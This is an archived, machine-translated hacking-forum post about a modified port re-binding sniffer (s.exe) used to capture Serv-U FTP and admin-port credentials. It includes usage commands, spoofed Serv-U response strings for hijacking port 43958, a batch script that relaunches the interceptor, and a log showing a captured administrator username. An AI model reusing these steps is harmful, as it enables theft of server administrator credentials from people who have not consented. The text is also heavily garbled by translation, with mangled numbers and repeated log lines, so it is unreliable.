On the s6 su Admin Password Sniffer-vulnerability warning-the black bar safety net

2005-10-04T00:00:00
ID MYHACK58:6220053163
Type myhack58
Reporter 佚名
Modified 2005-10-04T00:00:00

Description

A long time ago ago, FlashSky in the security focus of the above is a review Paper On Introduction to the use of the port dynamic re-binding technology Sniffer. The principle is very simple, I will not repeat it, interested can turn out to look. I this little tool is in Him is given the code base to be modified. In the command line parameters to set the bound IP and port number. the-z parameter: his role is to bind the machine 1 2 7. 0. 0. 1 Specify port, and then taken to pass the specified IP address must be on the computer that has the IP to access the port communications. This is just and that Paper described the principle of the opposite. Note: If the specified IP is 1 2 7. 0. 0. 1, It will cause dead loop, cause the system to crash, at least on my machine is such an effect, cry me -zz parameters: use no data loop of the intercept work. His role is to bind the specified IP to the specified port, then when there is through this IP to access the specified port of the communication, using the[FileName]parameter to provide the file as echo, if you need multiple echo, the file use“-Mix-”as the delimiter. Look at the specific use: The Codz is Based On FlashSky's , Modified By Mix . So It's Used By My Friends , Please Don't Spread ! Parameter Error s.exe x xxx. xxx. xxx. xxx xxxxx [FileName] [ x ---> -z || -zz || Other ] In the first case. When the host 192.168.150.2 service binding 1 2 7. 0. 0. 1: s.exe -a 192.168.150.2 2 1 You can sniff to from 1 9 2. 1 6 8. 1 5 0. 2 Access 2 1 The communication port, wherein-a can not be replaced by other commands The second case. When the host 192.168.150.2 service bound 1 9 2. 1 6 8. 1 5 0. 2: s.exe -z 192.168.150.2 2 1 You can sniff to from 1 2 7. 0. 0. 1 Access 2 1 port of the communication, in fact, the feeling that nothing with the kind of, anyway is also a small function, so it is plus to. The first three cases. The use of loop-free manner for the interception of: a. When the host service binding 1 2 7. 0. 0. 1: s.exe -zz 127.0.0.1 2 1 1.txt When using nc-vv 127.0.0.1 2 1 time, it will display 1. txt in the“first echo data”, is sent once after the data, and echo back 1. txt in the“second echo data”, and so on. When the connection is disconnected and again with connected came in, s. exe automatically exit, will receive data the right to return to the original service. b. When the host service binding 1 9 2. 1 6 8. 1 5 0. 2: s.exe -zz 192.168.150.2 2 1 1.txt When using nc-vv 192.168.150.2 2 to 1, It will display 1. txt in the“first echo data”, is sent once after the data, and echo back 1. txt in the“second echo data”, and so on. When the connection is disconnected and again with connected came in, s. exe automatically exit, will receive data the right to return to the original service. Which 1. txt contains the content is: -------- cut here-------- The first echo data -Mix- The second echo data -Mix- -------- cut here-------- Can according to need to give a few back, the middle use“-Mix-”the partition

Test only the first and the third case, the record of the visitor all the Send data, the server returns the data not to be recorded, the recording file is the program the same directory as the log. log. The second case has yet to be debugged. In fact, if the writing does not need to parameters directly to parameters built into the program to go, and with a special configuration program to configure this can also be, unfortunately I'm more lazy now! Ha ha~~~forgive me.

---------------------------Fill in the 2 0 0 5. 0 1. 1 0--------------------------- Test a bit of combat,-a parameter capable of recording serv-u5. 0 username and password, but if the client is active forced disconnect and then connect, it will make the program automatically quit. ---------------------------Fill in the 2 0 0 5. 0 1. 2 3--------------------------- Modify a bit in the third case, using the non-loop way to intercept the function, by specifying the special return information, can be intercepted to serv-6. 0 1 2 7. 0. 0. 1:4 3 9 5 8 port communication. The specified return information are set as follows: -------- cut here-------- 2 2 0 Serv-U FTP Server v6. 0 for WinSock ready... -Mix- 3 3 1 User name okay, need password. -Mix- 2 3 0 User logged in, proceed. -Mix- -------- cut here-------- But there are more depressing things is that Serv-U 6.0 at the start ServUAdmin. exe tries to connect to 4 3 9 5 8 management port, you may be asked ServUDaemon. exe to re-bind the port, that is the first run of the port intercepts the program will in he this measures the impact of losing the role, so must be in Start ServUAdmin. exe when ever the call port of the intercept program, the party can ensure its re-bind the Port to connect the port of this program in the period with a port intercept program is running, the port intercept procedures to re-obtain 4 3 9 5 8 management port of the management rights. Utilize my publish of that boring multi-threaded IP port scan BAT batch modification can be achieved after, you can also use pskill or other programs of the power to ensure that the batch results of perfection, I myself have been testing a successful. In addition correction a bit“if the client is active forced disconnect and then connect, it will make the program automatically quit”, so that in the client forcibly disconnected when the program will also exit.

================================ Nothing changed a bit Set ip=1 echo...... Strat to Scan...... :Main netstat-an|find /C "%1" >temp. temp FOR /F "eol=; tokens=1,3* delims=," %%i in (temp. temp) do IF /I %%i GEQ %3 del temp. temp&&goto ScanMain goto Main :ScanMain echo %1%ip%:%2 start "5 of 5 8 of 8" /MIN s-zz 127.0.0.1 4 3 9 5 8 d:\1.txt Set /A ip=%ip%+1 if %ip% GEQ 4 0 goto Exit goto ScanMain :Exit echo...... Scan has OK!...... set ip=

Use: 1. bat 4 3 9 5 8 4 3 9 5 8 3 3 is a netstat-an|find /C "4 3 9 5 8"in the results plus 1 However, this can only sniffing program to automatically login password If the modified password will pop-up prompts It seems like just smell. ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ USER LocalAdministrator ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------ ------ Start The Log------------ Start The Log------ ------ Start The Log------ ------ Start The Log------ Only a sniff to the username. The batch effect is to constantly view the port number When the number changes when you start the Sniffer app, and feel too occupied resources. There is a better method to stick out.